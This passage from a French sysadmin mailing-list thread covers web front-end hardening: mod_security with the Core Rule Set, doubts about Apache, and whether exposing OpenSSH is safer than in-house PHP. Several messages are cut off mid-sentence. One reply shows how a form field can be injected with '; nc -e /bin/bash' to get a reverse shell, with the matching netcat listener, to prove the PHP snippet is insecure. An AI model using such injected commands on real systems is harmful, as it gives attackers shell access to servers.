> Le 2 mai 2024 à 17:16, Ludovic Levet via FRsAG a écrit :
>
>
> Le minimum que l'on fait pour un serveur web frontal de ce type est de mettre
> en place le mod_security d'apache avec les customs rules qui vont bien ...
>
> Et d'y ajouter le bon core rule set :
> https://github.com/corerules
Sans troller...
Le minimum n'est-il pas de ne plus utiliser Apache (perfs totalement
nazes + sécu non centralisée) ?
--
Stéphane Rivière
Ile d'Oléron - France
___
Liste de diffusion du %(real_name)s
http://www.frsag.org/
Le minimum que l'on fait pour un serveur web frontal de ce type est de
mettre en place le mod_security d'apache avec les customs rules qui vont
bien ...
Et d'y ajouter le bon core rule set :
https://github.com/coreruleset/coreruleset
J'ai quand même fait l'essai sans le mod_security et ta
Bonjour à tous,
dans tous les cas, il est nécessaire d'avoir un composant logiciel
exposé au public, il me parrait préférable de se reposer sur du code
trés surveillé comme ssh et sa partie authentification que sur un bout
de php écrit en interne.
Sans présumer de la qualité des personnes dével
Bien vu :)
D’une manière générale, je me demandais s’il y avait quelque chose de rationnel
qui permettait d’estimer qu’un serveur HTTP avait moins de chance de comporter
de trou de sécurité que openssh, et que donc il était plus sûr de se reposer
sur Apache/Neginx plutôt que sur openssh avec cl
Hello,
au vu du morceau de php indiqué, il suffit d'envoyer le formulaire avec
:
; nc -e /bin/bash
du côté attaquant lancer :
$ nc -lvp
Et voilà un reverse shell simpliste qui contourne l'auth ssh.
--
Julien.
Le 01/05/2024 21:33, Ludovic LEVET via FRsAG a écrit :
Heu ...
Déjà
